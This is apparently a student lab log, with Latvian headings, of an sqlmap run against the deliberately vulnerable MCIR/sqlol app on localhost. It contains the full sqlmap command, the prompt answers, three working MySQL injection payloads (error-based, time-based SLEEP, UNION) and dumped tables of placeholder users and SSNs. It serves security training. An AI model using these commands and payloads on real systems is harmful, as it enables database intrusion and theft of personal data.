=================================================================================
0. Palaistā komanda
sqlmap -u "http://localhost/MCIR/sqlol/select.php?sanitization_level=none&sanitization_type=keyword&sanitization_params=&query_results=all_rows&error_level=verbose&show_query=on&inject_string=test&location=where_string&submit=Inject%21" -p inject_string --dump --risk=1 --level=1

1. Jautājumi, kurus uzdeva SQLMap
1.1. it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
1.2. for the remaining tests, do you want to include all tests for MySQL extending provided level (1) and risk (1) values? [Y/n] n
1.3. GET parameter 'inject_string' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
=================================================================================
sqlmap identified the following injection point(s) with a total of 42 HTTP(s) requests:
---
Parameter: inject_string (GET)
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: sanitization_level=none&sanitization_type=keyword&sanitization_params=&query_results=all_rows&error_level=verbose&show_query=on&inject_string=test' AND EXTRACTVALUE(7462,CONCAT(0x5c,0x71707a6271,(SELECT (ELT(7462=7462,1))),0x7162786b71)) AND 'VWeh'='VWeh&location=where_string&submit=Inject!

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: sanitization_level=none&sanitization_type=keyword&sanitization_params=&query_results=all_rows&error_level=verbose&show_query=on&inject_string=test' AND (SELECT 7402 FROM (SELECT(SLEEP(5)))RopY) AND 'cRba'='cRba&location=where_string&submit=Inject!

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: sanitization_level=none&sanitization_type=keyword&sanitization_params=&query_results=all_rows&error_level=verbose&show_query=on&inject_string=test' UNION ALL SELECT CONCAT(0x71707a6271,0x7057687a614168425369476a444e504e7053595a6c41704a4e484e55544943666950505573444656,0x7162786b71)-- -&location=where_string&submit=Inject!
---
web application technology: PHP 5.6.40, Apache 2.4.38
back-end DBMS: MySQL >= 5.1
Database: sqlol
Table: users
[5 entries]
+----+---------+-----------------------+
| id | isadmin | username              |
+----+---------+-----------------------+
| 1  | 1       | Herp Derper           |
| 2  | 1       | SlapdeBack LovedeFace |
| 3  | 0       | Wengdack Slobdegoob   |
| 4  | 0       | Chunk MacRunfast      |
| 5  | 0       | Peter Weiner          |
+----+---------+-----------------------+

Database: sqlol
Table: ssn
[5 entries]
+-------------+-----------------------+
| ssn         | name                  |
+-------------+-----------------------+
| 000-00-1112 | Wengdack Slobdegoob   |
| 012-34-5678 | Herp Derper           |
| 111-22-3333 | Peter Weiner          |
| 666-67-6776 | Chunk MacRunfast      |
| 999-99-9999 | SlapdeBack LovedeFace |
+-------------+-----------------------+

